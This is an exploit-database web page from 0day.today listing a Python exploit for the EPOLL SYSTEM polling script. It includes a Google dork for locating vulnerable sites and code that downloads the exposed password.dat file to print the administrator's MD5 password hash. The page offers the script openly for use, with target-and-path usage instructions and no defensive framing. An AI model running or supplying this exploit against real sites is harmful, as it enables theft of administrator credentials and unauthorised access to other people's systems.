0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
EPOLL SYSTEM 3.1 (password.dat) Disclosure Exploit
================================================== EPOLL SYSTEM 3.1 (password.dat) Disclosure Exploit ================================================== #!/usr/bin/python #Portal Name: EPOLL SYSTEM #Version : All version #'Google Dork : Powered by Egorix #Exploit Coded by: Pouya_Server #Exploit Discovered by: Pouya_Server #Contact Me : Pouya.s3rver@Gmail.com #Epoll system login page = www.site.com/[Path]/admin.php import urllib import sys import parser serv="http://" i=0 for arg in sys.argv: i=i+1 if i!=3: print """\n\n \tEpoll System (password.dat) \tUsage:exploit.py [targetsite] [path] \tExample:exploit.py www.target.com /Path/ \tResult= Admin Pass [MD5]" \n\n""" else: adres=sys.argv[1] path=sys.argv[2] str1=adres.join([serv,path]) str2=str1.join(['','/password.dat']) print "\n[~]Connecting..." url=urllib.urlopen(str2).read(); print "\n[+]Connected!" test=url.find(path); t=0; print "\n\t\t\t-=[Admin Password]=-" while(url[test+1]!=1): # Pouya print url[test], if(url[test]=='\n'): t=t+1; if(t==2): break; test=test+1; print "\n\n\t\t\t[ Coded by Pouya_Server ]" # 0day.today [2024-11-16] #